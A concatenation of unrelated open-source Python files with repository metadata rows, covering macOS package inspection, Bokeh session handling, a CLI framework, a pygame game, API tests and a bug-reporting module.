infoarray = self.getFlatPackageInfo(self.source_path)
self.output("Unpacked %s to %s"
% (self.source_path, self.env['destination_path']))
finally:
if dmg:
self.unmount(dmg_path)
    def getFlatPackageInfo(self, pkgpath):
"""
returns array of dictionaries with info on subpackages
contained in the flat package
"""
infoarray = []
# get the absolute path to the pkg because we need to do a chdir later
abspkgpath = os.path.abspath(pkgpath)
# make a tmp dir to expand the flat package into
        pkgtmp = tempfile.mkdtemp()
# record our current working dir
cwd = os.getcwd()
# change into our tmpdir so we can use xar to unarchive the flat package
os.chdir(pkgtmp)
cmd = ['/usr/bin/xar', '-xf', abspkgpath, '--exclude', 'Payload']
proc = subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(unused_output, err) = proc.communicate()
if proc.returncode == 0:
currentdir = pkgtmp
packageinfofile = os.path.join(currentdir, 'PackageInfo')
            # NOTE: parsePkgRefs is not defined in this file; it comes from
            # munki's munkicommon module that this code was adapted from.
            if os.path.exists(packageinfofile):
                infoarray = parsePkgRefs(packageinfofile)
if not infoarray:
# found no PackageInfo file
# so let's look at the Distribution file
distributionfile = os.path.join(currentdir, 'Distribution')
if os.path.exists(distributionfile):
infoarray = parsePkgRefs(distributionfile, path_to_pkg=pkgpath)
if not infoarray:
# No PackageInfo file or Distribution file
# look for subpackages at the top level
                for item in os.listdir(currentdir):
itempath = os.path.join(currentdir, item)
if itempath.endswith('.pkg') and os.path.isdir(itempath):
packageinfofile = os.path.join(itempath, 'PackageInfo')
if os.path.exists(packageinfofile):
infoarray.extend(parsePkgRefs(packageinfofile))
else:
raise ProcessorError(err)
# change back to original working dir
os.chdir(cwd)
shutil.rmtree(pkgtmp)
return infoarray
if __name__ == '__main__':
processor = FlatPkgVersioner()
    processor.execute_shell()
# File: htygithub/bokeh/bokeh/server/views/doc_handler.py
''' Provide a request handler that returns a page displaying a document.
'''
from __future__ import absolute_import, print_function
import logging
log = logging.getLogger(__name__)
import hashlib
import random
import time
from tornado.web import RequestHandler
from bokeh.embed import server_html_page_for_session
from bokeh.settings import settings
# Use the system PRNG for session id generation (if possible)
# NOTE: secure random string generation implementation is adapted
# from the Django project. Reference:
# https://github.com/django/django/blob/0ed7d155635da9f79d4dd67e4889087d3673c6da/django/utils/crypto.py
try:
random = random.SystemRandom()
using_sysrandom = True
except NotImplementedError:
import warnings
warnings.warn('A secure pseudo-random number generator is not available '
'on your system. Falling back to Mersenne Twister.')
using_sysrandom = False
def get_random_string(length=36,
allowed_chars='abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):
"""
Return a securely generated random string.
    The default length of 36 with the a-z, A-Z, 0-9 character set returns
    a 214-bit value. log_2((26+26+10)^36) =~ 214 bits
"""
if not using_sysrandom:
# This is ugly, and a hack, but it makes things better than
# the alternative of predictability. This re-seeds the PRNG
# using a value that is hard for an attacker to predict, every
# time a random string is required. This may change the
# properties of the chosen random sequence slightly, but this
# is better than absolute predictability.
random.seed(
hashlib.sha256(
("%s%s%s" % (
random.getstate(),
time.time(),
settings.SECRET_KEY)).encode('utf-8')
).digest())
return ''.join(random.choice(allowed_chars) for i in range(length))
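# Illustrative call: get_random_string() yields a 36-character id such as
# 'pmxdiqjlyfzfcmtkxbaeuwhjdtqkncvxaaos' (value shown is made up).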
class DocHandler(RequestHandler):
''' Implements a custom Tornado handler for document display page
'''
def __init__(self, tornado_app, *args, **kw):
self.application_context = kw['application_context']
self.bokeh_websocket_path = kw['bokeh_websocket_path']
# Note: tornado_app is stored as self.application
super(DocHandler, self).__init__(tornado_app, *args, **kw)
def initialize(self, *args, **kw):
pass
def get(self, *args, **kwargs):
session_id = self.get_argument("bokeh-session-id", default=None)
if session_id is None:
session_id = get_random_string()
session = self.application_context.create_session_if_needed(session_id)
websocket_url = self.application.websocket_url_for_request(self.request, self.bokeh_websocket_path)
page = server_html_page_for_session(session_id, self.application.resources(self.request),
title=session.document.title,
websocket_url=websocket_url)
self.set_header("Content-Type", 'text/html')
self.write(page)
| bsd-3-clause | 2,699,243,066,116,979,700 | 37.853659 | 109 | 0.644696 | false | 4.159269 | false | false | false |
# File: zyga/guacamole/guacamole/core.py
# encoding: utf-8
# This file is part of Guacamole.
#
# Copyright 2012-2015 Canonical Ltd.
# Written by:
# Zygmunt Krynicki <[email protected]>
#
# Guacamole is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License version 3,
# as published by the Free Software Foundation.
#
# Guacamole is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Guacamole. If not, see <http://www.gnu.org/licenses/>.
"""
The essence of guacamole.
This module defines the three essential core classes: :class:`Ingredient`,
:class:`Bowl`, :class:`Context`. All of those have stable APIs.
"""
from __future__ import absolute_import, print_function, unicode_literals
import logging
import sys
__all__ = (
'Bowl',
'Context',
'Ingredient',
)
_logger = logging.getLogger('guacamole')
class Ingredient(object):
"""
Part of guacamole.
Ingredients are a mechanism for inserting functionality into Guacamole.
The sequence of calls to ingredient methods is as follows:
- :meth:`added()`
The added method is where an ingredient can advertise itself to other
ingredients that it explicitly collaborates with.
- :meth:`preparse()`
The preparse method is where ingredients can have a peek at the command
line arguments. This can serve to optimize further actions. Essentially
guacamole allows applications to parse arguments twice while limiting the
work needed to do that correctly to the essential minimum.
- :meth:`early_init()`
The early initialization method can be used to do additional
initialization. It can take advantage of the fact that the whole command
line arguments are now known and may have been analyzed further by the
preparse method.
- :meth:`parse()`
The parse method is where applications are expected to fully understand
command line arguments. This method can abort subsequent execution if
arguments are wrong in some way. After parsing command line arguments
the application should be ready for execution.
- :meth:`late_init()`
The late initialization method mimics the early initialization method but
is called after parsing all of the command line arguments. Again, it can be
used to prepare additional resources necessary for a given application.
- :meth:`dispatch()`
The dispatch method is where applications execute the bulk of their
actions. Dispatching is typically done with one of the standard
ingredients which will locate the appropriate method to call into the
application.
Depending on the outcome of the dispatch (if an exception is raised or not)
one of :meth:`dispatch_succeeded()` or :meth:`dispatch_failed()` is
called.
- :meth:`shutdown()`
This is the last method called on all ingredients.
Each of those methods is called with a context argument
(:class:`Context:`). A context is a free-for-all environment where
ingredients can pass data around. There is no name-spacing. Ingredients
should advertise what they do with the context and what to expect.
"""
def __str__(self):
"""
Get the string representation of this ingredient.
The string method just returns the class name. Since the ingredient is
        an implementation detail it does not have anything that applications
should show to the user.
"""
return self.__class__.__name__
def added(self, context):
"""Ingredient method called before anything else."""
def build_early_parser(self, context):
"""Ingredient method called to build the early parser."""
def preparse(self, context):
"""Ingredient method called to pre-parse command line aruments."""
def early_init(self, context):
"""Ingredient method for early initialization."""
def build_parser(self, context):
"""Ingredient method called to build the full parser."""
def parse(self, context):
"""Ingredient method called to parse command line arguments."""
def late_init(self, context):
"""Ingredient method for late initialization."""
def dispatch(self, context):
"""
Ingredient method for dispatching (execution).
.. note::
The first ingredient that implements this method and returns
something other than None will stop command dispatch!
"""
def dispatch_succeeded(self, context):
"""Ingredient method called when dispatching is correct."""
def dispatch_failed(self, context):
"""Ingredient method called when dispatching fails."""
def shutdown(self, context):
"""Ingredient method called after all other methods."""
class Context(object):
"""
Context for making guacamole with ingredients.
A context object is created and maintained throughout the life-cycle of an
executing tool. A context is passed as argument to all ingredient methods.
Since context has no fixed API anything can be stored and loaded.
Particular ingredients document how they use the context object.
"""
def __repr__(self):
"""
Get a debugging string representation of the context.
The debugging representation shows all of the *names* of objects added
        to the context by various ingredients. Since the actual objects can
        have large and complex debugging representations, including them was
        considered a step against understanding what is in the context.
"""
return "<Context {{{}}}>".format(
', '.join(sorted(self.__dict__.keys())))
class Bowl(object):
"""
A vessel for preparing guacamole out of ingredients.
.. note::
Each Bowl is single-use. If you eat it you need to get another one as
this one is dirty and cannot be reused.
"""
def __init__(self, ingredients):
"""Prepare a guacamole out of given ingredients."""
self.ingredients = ingredients
self.context = Context()
self.context.bowl = self
self.context.spices = set()
def add_spice(self, spice):
"""
        Add a single spice to the bowl.
"""
self.context.spices.add(spice)
def has_spice(self, spice):
"""
Check if a given spice is being used.
        This method can be used to check whether an optional ingredient
        feature should be enabled or not. Spices are simply strings that
describe optional features.
"""
return spice in self.context.spices
def eat(self, argv=None):
"""
Eat the guacamole.
:param argv:
Command line arguments or None. None means that sys.argv is used
:return:
Whatever is returned by the first ingredient that agrees to perform
the command dispatch.
The eat method is called to run the application, as if it was invoked
from command line directly.
"""
# The setup phase, here KeyboardInterrupt is a silent sign to exit the
# application. Any error that happens here will result in a raw
# backtrace being printed to the user.
try:
self.context.argv = argv
self._added()
self._build_early_parser()
self._preparse()
self._early_init()
self._build_parser()
self._parse()
self._late_init()
except KeyboardInterrupt:
self._shutdown()
return
# The execution phase. Here we differentiate SystemExit from all other
# exceptions. SystemExit is just re-raised as that's what any piece of
# code can raise to ask to exit the currently running application. All
# other exceptions are recorded in the context and the failure-path of
        # the dispatch is followed. Otherwise, when there are no
        # exceptions, the success-path is followed. In both cases, ingredients
# are shut down.
        try:
            result = self._dispatch()
        except SystemExit:
            raise
        except BaseException:
            (self.context.exc_type, self.context.exc_value,
             self.context.traceback) = sys.exc_info()
            self._dispatch_failed()
        else:
            # Return from the else clause rather than inside the try block;
            # a return inside try would skip this clause and the
            # success-path hook would never run.
            self._dispatch_succeeded()
            return result
        finally:
            self._shutdown()
def _added(self):
"""Run the added() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.added(self.context)
def _build_early_parser(self):
"""Run build_early_parser() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.build_early_parser(self.context)
def _preparse(self):
"""Run the peparse() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.preparse(self.context)
def _early_init(self):
"""Run the early_init() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.early_init(self.context)
def _build_parser(self):
"""Run build_parser() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.build_parser(self.context)
def _parse(self):
"""Run the parse() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.parse(self.context)
def _late_init(self):
"""Run the late_init() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.late_init(self.context)
def _dispatch(self):
"""Run the dispatch() method on all ingredients."""
for ingredient in self.ingredients:
result = ingredient.dispatch(self.context)
if result is not None:
return result
def _dispatch_succeeded(self):
"""Run the dispatch_succeeded() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.dispatch_succeeded(self.context)
def _dispatch_failed(self):
"""Run the dispatch_failed() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.dispatch_failed(self.context)
def _shutdown(self):
"""Run the shutdown() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.shutdown(self.context)
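# Usage sketch (illustrative, not part of guacamole): combine ingredients in
# a Bowl and eat it as if the tool were invoked from the command line.
#     bowl = Bowl([_ExampleIngredient()])
#     bowl.eat(argv=[])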
| gpl-3.0 | 375,531,552,633,744,500 | 33.422222 | 79 | 0.657936 | false | 4.309618 | false | false | false |
Sivigik/Proutpulsor | app/main.py | 1 | 4347 | # -------------------------------------------------------------------------------
# Name: main - Proutpulsor
#
# Author: S.L-prog
#
# Licence: <GNU GENERAL PUBLIC LICENSE>
# -------------------------------------------------------------------------------
import pygame
from pygame.locals import *
# Set the screen size.
screen = pygame.display.set_mode((0,0), FULLSCREEN) #(800, 480)) #
pygame.init()
import classes
from constantes import *
import random
scrrec = screen.get_rect()
BACKGROUND = pygame.transform.scale(BACKGROUND, (scrrec.right, scrrec.bottom))
# Import the android module. If we can't import it, set it to None - this
# lets us test it, and check to see if we want android-specific behavior.
try:
import android
except ImportError:
android = None
# Event constant.
TIMEREVENT = pygame.USEREVENT
# The FPS the game runs at.
FPS = 30
def universegenerator(number_ext, number_ast, number_hamb):
extinguisher = [0]*number_ext
for i in range(0,number_ext):
extinguisher[i] = classes.Item(scrrec.center, EXTINGUISHER)
asteroid = [0]*number_ast
for i in range(0,number_ast):
        # pick one of the four asteroid sprites with equal probability
        sprite = random.choice((ASTEROID1, ASTEROID2, ASTEROID3, ASTEROID4))
        asteroid[i] = classes.Item(scrrec.center, sprite)
hamburger = [0]*number_hamb
for i in range(0,number_hamb):
hamburger[i] = classes.Item(scrrec.center, HAMBURGER)
return extinguisher, asteroid, hamburger
def displayuniverse(extinguisher, asteroid, hamburger, screen, astronautx, astronauty):
for i in range(0,len(extinguisher)):
extinguisher[i].display(screen, astronautx, astronauty)
for i in range(0,len(asteroid)):
asteroid[i].display(screen, astronautx, astronauty)
for i in range(0,len(hamburger)):
hamburger[i].display(screen, astronautx, astronauty)
def main():
astronaut = classes.Astronaut(scrrec.center)
    extinguisher, asteroid, hamburger = universegenerator(50,200,50) # number of items at start
# Map the back button to the escape key.
if android:
android.init()
android.map_key(android.KEYCODE_BACK, pygame.K_ESCAPE)
    # re-enable for python 2.7
#pygame.time.set_timer(TIMEREVENT, 1000 / FPS)
screenleft = screen.get_width()/2
screentop = screen.get_height()/2
game = True
while game:
# Android-specific:
if android:
if android.check_pause():
android.wait_for_resume()
for ev in pygame.event.get():
if ev.type == pygame.MOUSEBUTTONDOWN:
if ev.pos[0] <= screenleft:
if ev.pos[1] <= screentop:
astronaut.extinguisher_right = True
if ev.pos[1] > screentop:
astronaut.extinguisher_left = True
if ev.pos[0] > screenleft:
astronaut.fart = True
if ev.type == pygame.MOUSEBUTTONUP:
astronaut.extinguisher_right = False
astronaut.extinguisher_left = False
astronaut.fart = False
if ev.type == pygame.KEYDOWN and ev.key == pygame.K_ESCAPE:
game = False
if ev.type == pygame.KEYDOWN and ev.key == pygame.K_SPACE:
if astronaut.takeextinguisher == False:
astronaut.takeextinguisher = True
else:
astronaut.takeextinguisher = False
astronaut.mouvement()
screen.blit(BACKGROUND, (0,0))
        pygame.draw.line(screen, (255, 0, 0), (screenleft, 0), (screenleft,screentop*2), 5) # draw zone boundary
        pygame.draw.line(screen, (255, 0, 0), (0, screentop), (screenleft,screentop), 5) # draw zone boundary
displayuniverse(extinguisher, asteroid, hamburger, screen, astronaut.astroposition_x, astronaut.astroposition_y)
astronaut.display(screen)
pygame.display.flip()
pygame.quit()
# re-enable for python 2.7
#if __name__ == '__main__':
# main()
# disable for python 2.7
main() | gpl-2.0 | -286,329,088,505,806,270 | 30.737226 | 120 | 0.599264 | false | 3.359351 | false | false | false |
cardforcoin/chain-bitcoin-python | chain_bitcoin/tests/test_create_webhook.py | 2 | 1730 | from __future__ import absolute_import
import sure
from .. import Chain, NoApiKeyId, NoApiKeySecret, Webhook, create_webhook
from .mock_http_adapter import *
def test_create_webhook():
create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
api_key_id=api_key_id, api_key_secret=api_key_secret,
http_adapter=http_adapter) \
.should.equal(webhook)
def test_create_webhook_using_class():
Chain(api_key_id=api_key_id, api_key_secret=api_key_secret,
http_adapter=http_adapter) \
.create_webhook(webhook_id=webhook_id, webhook_url=webhook_url) \
.should.equal(webhook)
def test_create_webhook_without_api_key_id():
(lambda: create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
http_adapter=no_http())) \
.should.throw(NoApiKeyId)
def test_create_webhook_without_api_key_secret():
(lambda: create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
api_key_id=api_key_id, http_adapter=no_http())) \
.should.throw(NoApiKeySecret)
api_key_id = 'DEMO-4a5e1e4'
api_key_secret = 'DEMO-f8aef80'
webhook_id = 'FFA21991-5669-4728-8C83-74DEC4C93A4A'
webhook_url = 'https://username:[email protected]'
url = 'https://api.chain.com/v1/webhooks'
request_json = """
{
"id": "FFA21991-5669-4728-8C83-74DEC4C93A4A",
"url": "https://username:[email protected]"
}
"""
response_body = """
{
"id": "FFA21991-5669-4728-8C83-74DEC4C93A4A",
"url": "https://username:[email protected]"
}
"""
webhook = Webhook(
id=webhook_id,
url=webhook_url,
)
http_adapter = mock_post_json(url, request_json, response_body)
| mit | 1,479,255,687,255,157,200 | 26.460317 | 77 | 0.660116 | false | 2.831424 | false | false | false |
chop-dbhi/serrano | serrano/urls.py | 1 | 1536 | from django.conf.urls import patterns, url, include
from serrano.conf import dep_supported
# Patterns for the data namespace
data_patterns = patterns(
'',
url(r'^export/', include('serrano.resources.exporter')),
url(r'^preview/', include('serrano.resources.preview')),
)
# Patterns for the serrano namespace
serrano_patterns = patterns(
'',
url(r'^',
include('serrano.resources')),
url(r'^async/',
include('serrano.resources.async', namespace='async')),
url(r'^categories/',
include('serrano.resources.category')),
url(r'^concepts/',
include('serrano.resources.concept')),
url(r'^contexts/',
include('serrano.resources.context', namespace='contexts')),
url(r'^data/',
include(data_patterns, namespace='data')),
url(r'^fields/',
include('serrano.resources.field')),
url(r'^jobs/',
include('serrano.resources.jobs', namespace='jobs')),
url(r'^queries/',
include('serrano.resources.query', namespace='queries')),
url(r'^stats/',
include('serrano.resources.stats', namespace='stats')),
url(r'^views/',
include('serrano.resources.view', namespace='views')),
)
if dep_supported('objectset'):
# Patterns for the 'sets' namespace
serrano_patterns += patterns(
'',
url(r'^sets/', include('serrano.resources.sets', namespace='sets'))
)
# Exported patterns
urlpatterns = patterns(
'',
url(r'^', include(serrano_patterns, namespace='serrano'))
)
| bsd-2-clause | 7,945,734,449,250,110,000 | 23.380952 | 75 | 0.625651 | false | 3.737226 | false | false | false |
sorki/faf | src/pyfaf/opsys/centos.py | 2 | 8825 | # Copyright (C) 2013 ABRT Team
# Copyright (C) 2013 Red Hat, Inc.
#
# This file is part of faf.
#
# faf is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# faf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with faf. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import re
from pyfaf.opsys import System
from pyfaf.checker import DictChecker, IntChecker, ListChecker, StringChecker
from pyfaf.common import FafError, log
from pyfaf.queries import (get_archs,
get_arch_by_name,
get_opsys_by_name,
get_package_by_nevra,
get_releases,
get_reportpackage,
get_repos_for_opsys,
get_unknown_package)
from pyfaf.storage import (Arch,
Build,
OpSys,
OpSysReleaseStatus,
Package,
ReportPackage,
ReportUnknownPackage,
column_len)
from pyfaf.repos.yum import Yum
__all__ = ["CentOS"]
class CentOS(System):
name = "centos"
nice_name = "CentOS"
packages_checker = ListChecker(
DictChecker({
"name": StringChecker(pattern=r"^[a-zA-Z0-9_\-\.\+~]+$",
maxlen=column_len(Package,
"name")),
"epoch": IntChecker(minval=0),
"version": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "version")),
"release": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "release")),
"architecture": StringChecker(pattern=r"^[a-zA-Z0-9_]+$",
maxlen=column_len(Arch, "name")),
}), minlen=1
)
ureport_checker = DictChecker({
# no need to check name, version and architecture twice
# the toplevel checker already did it
# "name": StringChecker(allowed=[CentOS.name])
# "version": StringChecker()
# "architecture": StringChecker()
})
pkg_roles = ["affected", "related", "selinux_policy"]
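    # Illustrative example (not part of faf): a package dict accepted by
    # packages_checker above --
    #   {"name": "bash", "epoch": 0, "version": "4.2.46",
    #    "release": "31.el7", "architecture": "x86_64",
    #    "package_role": "affected"}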
@classmethod
def install(cls, db, logger=None):
if logger is None:
logger = log.getChildLogger(cls.__name__)
logger.info("Adding CentOS")
new = OpSys()
new.name = cls.nice_name
db.session.add(new)
db.session.flush()
@classmethod
def installed(cls, db):
return bool(get_opsys_by_name(db, cls.nice_name))
def __init__(self):
super(CentOS, self).__init__()
self.load_config_to_self("base_repo_url", ["centos.base-repo-url"],
"http://vault.centos.org/centos/$releasever/"
"os/Source/")
self.load_config_to_self("updates_repo_url", ["centos.updates-repo-url"],
"http://vault.centos.org/centos/$releasever/"
"updates/Source/")
def _save_packages(self, db, db_report, packages, count=1):
for package in packages:
role = "RELATED"
if "package_role" in package:
if package["package_role"] == "affected":
role = "CRASHED"
elif package["package_role"] == "selinux_policy":
role = "SELINUX_POLICY"
db_package = get_package_by_nevra(db,
name=package["name"],
epoch=package["epoch"],
version=package["version"],
release=package["release"],
arch=package["architecture"])
if db_package is None:
self.log_warn("Package {0}-{1}:{2}-{3}.{4} not found in "
"storage".format(package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"]))
db_unknown_pkg = get_unknown_package(db,
db_report,
role,
package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"])
if db_unknown_pkg is None:
db_arch = get_arch_by_name(db, package["architecture"])
if db_arch is None:
continue
db_unknown_pkg = ReportUnknownPackage()
db_unknown_pkg.report = db_report
db_unknown_pkg.name = package["name"]
db_unknown_pkg.epoch = package["epoch"]
db_unknown_pkg.version = package["version"]
db_unknown_pkg.release = package["release"]
db_unknown_pkg.arch = db_arch
db_unknown_pkg.type = role
db_unknown_pkg.count = 0
db.session.add(db_unknown_pkg)
db_unknown_pkg.count += count
continue
db_reportpackage = get_reportpackage(db, db_report, db_package)
if db_reportpackage is None:
db_reportpackage = ReportPackage()
db_reportpackage.report = db_report
db_reportpackage.installed_package = db_package
db_reportpackage.count = 0
db_reportpackage.type = role
db.session.add(db_reportpackage)
db_reportpackage.count += count
def validate_ureport(self, ureport):
CentOS.ureport_checker.check(ureport)
return True
def validate_packages(self, packages):
CentOS.packages_checker.check(packages)
for package in packages:
if ("package_role" in package and
package["package_role"] not in CentOS.pkg_roles):
raise FafError("Only the following package roles are allowed: "
"{0}".format(", ".join(CentOS.pkg_roles)))
return True
def save_ureport(self, db, db_report, ureport, packages, flush=False, count=1):
self._save_packages(db, db_report, packages, count=count)
if flush:
db.session.flush()
def get_releases(self):
return {"7": {"status": "ACTIVE"}}
def get_components(self, release):
urls = [repo.replace("$releasever", release)
for repo in [self.base_repo_url, self.updates_repo_url]]
yum = Yum(self.name, *urls)
components = list(set(pkg["name"]
for pkg in yum.list_packages(["src"])))
return components
#def get_component_acls(self, component, release=None):
# return {}
def get_build_candidates(self, db):
return (db.session.query(Build)
.filter(Build.release.like("%%.el%%"))
.all())
def check_pkgname_match(self, packages, parser):
for package in packages:
if ("package_role" not in package or
package["package_role"].lower() != "affected"):
continue
nvra = "{0}-{1}-{2}.{3}".format(package["name"],
package["version"],
package["release"],
package["architecture"])
match = parser.match(nvra)
if match is not None:
return True
return False
| gpl-3.0 | -8,390,464,450,429,315,000 | 40.238318 | 83 | 0.475581 | false | 4.757412 | false | false | false |
anthonyalmarza/trex | tests/test_scripting.py | 1 | 6913 | import sys
import hashlib
import trex
from trex import redis
from twisted.internet import defer
from twisted.trial import unittest
from twisted.internet import reactor
from twisted.python import failure
from .mixins import Redis26CheckMixin, REDIS_HOST, REDIS_PORT
class TestScripting(unittest.TestCase, Redis26CheckMixin):
_SCRIPT = "return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}" # From redis example
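    # Illustrative note (not in the original test): EVALing _SCRIPT echoes
    # its keys and args back, e.g. keys ('k1', 'k2') with args ('a', 'b')
    # yield ['k1', 'k2', 'a', 'b'].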
@defer.inlineCallbacks
def setUp(self):
self.db = yield redis.Connection(REDIS_HOST, REDIS_PORT,
reconnect=False)
self.db1 = None
self.redis_2_6 = yield self.is_redis_2_6()
yield self.db.script_flush()
@defer.inlineCallbacks
def tearDown(self):
yield self.db.disconnect()
if self.db1 is not None:
yield self.db1.disconnect()
@defer.inlineCallbacks
def test_eval(self):
self._skipCheck()
keys = ('key1', 'key2')
args = ('first', 'second')
r = yield self.db.eval(self._SCRIPT, keys, args)
self._check_eval_result(keys, args, r)
r = yield self.db.eval("return 10")
self.assertEqual(r, 10)
r = yield self.db.eval("return {1,2,3.3333,'foo',nil,'bar'}")
self.assertEqual(r, [1, 2, 3, "foo"])
# Test the case where the hash is in script_hashes,
# but redis doesn't have it
h = self._hash_script(self._SCRIPT)
yield self.db.script_flush()
conn = yield self.db._factory.getConnection(True)
conn.script_hashes.add(h)
r = yield self.db.eval(self._SCRIPT, keys, args)
self._check_eval_result(keys, args, r)
@defer.inlineCallbacks
def test_eval_keys_only(self):
self._skipCheck()
keys = ['foo', 'bar']
args = []
r = yield self.db.eval("return {KEYS[1],KEYS[2]}", keys, args)
self.assertEqual(r, keys)
r = yield self.db.eval("return {KEYS[1],KEYS[2]}", keys=keys)
self.assertEqual(r, keys)
@defer.inlineCallbacks
def test_eval_args_only(self):
self._skipCheck()
keys = []
args = ['first', 'second']
r = yield self.db.eval("return {ARGV[1],ARGV[2]}", keys, args)
self.assertEqual(r, args)
r = yield self.db.eval("return {ARGV[1],ARGV[2]}", args=args)
self.assertEqual(r, args)
@defer.inlineCallbacks
def test_eval_error(self):
self._skipCheck()
try:
result = yield self.db.eval('return {err="My Error"}')
except trex.exceptions.ResponseError:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ResponseError',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
@defer.inlineCallbacks
def test_evalsha(self):
self._skipCheck()
r = yield self.db.eval(self._SCRIPT)
h = self._hash_script(self._SCRIPT)
r = yield self.db.evalsha(h)
self._check_eval_result([], [], r)
@defer.inlineCallbacks
def test_evalsha_error(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
try:
result = yield self.db.evalsha(h)
except trex.exceptions.ScriptDoesNotExist:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ScriptDoesNotExist',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
@defer.inlineCallbacks
def test_script_load(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
r = yield self.db.script_exists(h)
self.assertFalse(r)
r = yield self.db.script_load(self._SCRIPT)
self.assertEqual(r, h)
r = yield self.db.script_exists(h)
self.assertTrue(r)
@defer.inlineCallbacks
def test_script_exists(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
script1 = "return 1"
h1 = self._hash_script(script1)
r = yield self.db.script_exists(h)
self.assertFalse(r)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [False, False])
yield self.db.script_load(script1)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [False, True])
yield self.db.script_load(self._SCRIPT)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [True, True])
@defer.inlineCallbacks
def test_script_kill(self):
self._skipCheck()
try:
result = yield self.db.script_kill()
except trex.exceptions.NoScriptRunning:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.NoScriptRunning',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
# Run an infinite loop script from one connection
# and kill it from another.
inf_loop = "while 1 do end"
self.db1 = yield redis.Connection(REDIS_HOST, REDIS_PORT,
reconnect=False)
eval_deferred = self.db1.eval(inf_loop)
reactor.iterate()
r = yield self.db.script_kill()
self.assertEqual(r, 'OK')
try:
result = yield eval_deferred
except trex.exceptions.ResponseError:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ResponseError',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
def _check_eval_result(self, keys, args, r):
self.assertEqual(r, list(keys) + list(args))
def _hash_script(self, script):
return hashlib.sha1(script).hexdigest()
| mit | -6,848,204,817,567,871,000 | 36.166667 | 84 | 0.54101 | false | 4.097807 | true | false | false |
jfterpstra/bluebottle | bluebottle/recurring_donations/serializers.py | 1 | 1038 | from bluebottle.recurring_donations.models import (MonthlyDonor,
MonthlyDonorProject)
from rest_framework import serializers
from bluebottle.donations.models import Donation
from bluebottle.projects.models import Project
class MonthlyDonationProjectSerializer(serializers.ModelSerializer):
project = serializers.SlugRelatedField(many=False, slug_field='slug',
queryset=Project.objects)
donation = serializers.PrimaryKeyRelatedField(source='donor',
queryset=MonthlyDonor.objects)
    class Meta:
model = MonthlyDonorProject
fields = ('id', 'donation', 'project')
class MonthlyDonationSerializer(serializers.ModelSerializer):
projects = MonthlyDonationProjectSerializer(many=True, read_only=True)
    class Meta:
model = MonthlyDonor
fields = ('id', 'amount', 'iban', 'bic', 'active', 'name', 'city',
'country', 'projects')
| bsd-3-clause | -5,822,631,650,316,790,000 | 40.52 | 80 | 0.636802 | false | 4.654709 | false | false | false |
polymorphm/tpl-txt-gen | lib_tpl_txt_gen_2012_09_27/tpl_txt_gen.py | 1 | 4774 | # -*- mode: python; coding: utf-8 -*-
#
# Copyright 2012, 2013 Andrej A Antonov <[email protected]>.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
assert str is not bytes
import os, os.path, weakref, importlib
from mako import lookup as mako_lookup
from . import get_items
class TplTxtGenEnviron(object):
pass
class ItemFunc(object):
def __init__(self, get_iter):
self._get_iter = get_iter
self._group_map = {}
def __call__(self, path, group=None):
if group is None:
return next(self._get_iter(path))
try:
